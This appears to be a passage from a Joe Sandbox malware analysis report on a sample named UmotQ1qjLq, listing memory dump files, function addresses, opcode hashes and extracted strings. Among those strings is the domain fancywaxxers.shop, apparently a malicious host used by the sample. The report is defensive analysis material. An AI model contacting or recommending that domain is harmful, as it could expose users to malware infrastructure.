Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: 30$b
API String ID: 0-3051719697
Opcode ID: 77da1a0ae77e4aa00330a6336feec4295b4283b335b5f711d1bf9062f28848f2
Instruction ID: e2070bb41bc5a17c85cb77b629da421d32d924e4efcf56ceb8ea2befb1e58c7d
Opcode Fuzzy Hash: 77da1a0ae77e4aa00330a6336feec4295b4283b335b5f711d1bf9062f28848f2
Instruction Fuzzy Hash: D2F114719483508BD734DF14D851BABB3F1EFE5354F088AACE48E4B291EB745841CB86

Function 00B1C6F0 Relevance: 3.0, Strings: 2, Instructions: 519COMMON

Download Yara Rule

Strings

~|, xrefs: 00B1CD42
fancywaxxers.shop, xrefs: 00B1CAAE, 00B1CE42

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: fancywaxxers.shop$~|
API String ID: 0-1994482202
Opcode ID: a103bbdef837f22929ffc43344774f48630564cd3c281dc3da71c7dbe7450e89
Instruction ID: b5bbbfe967da958013bda387d3c0e3aff86acca822686b354375647c19b46407
Opcode Fuzzy Hash: a103bbdef837f22929ffc43344774f48630564cd3c281dc3da71c7dbe7450e89
Instruction Fuzzy Hash: C202A9B01893C18AD7358F24D4907EFBFE1EB96304F1889ACC4D9AB252C7794946CB92

Function 06A5EEAA Relevance: 3.0, Strings: 2, Instructions: 486COMMON

Download Yara Rule

Strings

RM, xrefs: 06A5F423
~c_, xrefs: 06A5F506

Memory Dump Source

Source File: 00000000.00000002.2163561702.0000000006A3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: true

Associated: 00000000.00000002.2163468208.0000000006A30000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163497130.0000000006A32000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163527121.0000000006A36000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a30000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: RM$~c_
API String ID: 0-1019131949
Opcode ID: 76084d86cb36b3e4ab2449de25315d511319b1246a484918004fc97c3266f47a
Instruction ID: 33251ebd30f71a027cc51a3d3c58e012a44afe30dfbb4488f5c96f5a1996f2bb
Opcode Fuzzy Hash: 76084d86cb36b3e4ab2449de25315d511319b1246a484918004fc97c3266f47a
Instruction Fuzzy Hash: 62F100F3E006204BF3549938DD893667692EBA4320F1F863DDF88AB7C5E97E5C058285

Function 00B3847D Relevance: 2.9, Strings: 2, Instructions: 420COMMON

Download Yara Rule

Strings

!-%., xrefs: 00B38498
i=+9, xrefs: 00B3849F

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: !-%.$i=+9
API String ID: 0-3329930587
Opcode ID: d46a1c7ad327347f6503051b260a570e7901fdd59d6385e1d0f3bae29e6f85b0
Instruction ID: 1fdcb7ffbebd00b6490fc1d28f5e49c778050664bcaf313718156e248992d9d6
Opcode Fuzzy Hash: d46a1c7ad327347f6503051b260a570e7901fdd59d6385e1d0f3bae29e6f85b0
Instruction Fuzzy Hash: 73D1C0B4A04305CFCB14CFA8D8D1AAEBBF2FF59304F1441A8E4169B392EB349901CB51

Function 00B39040 Relevance: 2.9, Strings: 2, Instructions: 376COMMON

Download Yara Rule

Strings

#&J:, xrefs: 00B3921A
1?,s, xrefs: 00B39228

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: #&J:$1?,s
API String ID: 0-2217357408
Opcode ID: 08ed9f9c242003918483a33a5c0ee4476b8e7e6b5173bfadff4d0812986f8d2c
Instruction ID: 99243eef568ba1960c92f03596a15f832340a80f5ae5fb25b0cd3340529d3fa7
Opcode Fuzzy Hash: 08ed9f9c242003918483a33a5c0ee4476b8e7e6b5173bfadff4d0812986f8d2c
Instruction Fuzzy Hash: 78D13671A08244DFDB19CF68E891BAEBBF2EF49311F2841E8E4519B392DF758945CB10

Function 00B14280 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00B14671
), xrefs: 00B142FB

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 345a0ec8e7608dc02b3f338a15d2674dc7ce74467f872942f399b01d0c9c5405
Instruction ID: 34a910d59077389461d796148eccd7395ae06b9a63f0b32d26ddc2f52b01081c
Opcode Fuzzy Hash: 345a0ec8e7608dc02b3f338a15d2674dc7ce74467f872942f399b01d0c9c5405
Instruction Fuzzy Hash: A2D1DFB15083449FD720CF14D881B9BBBE4EB95308F5448ADF9999B382D775D988CB82

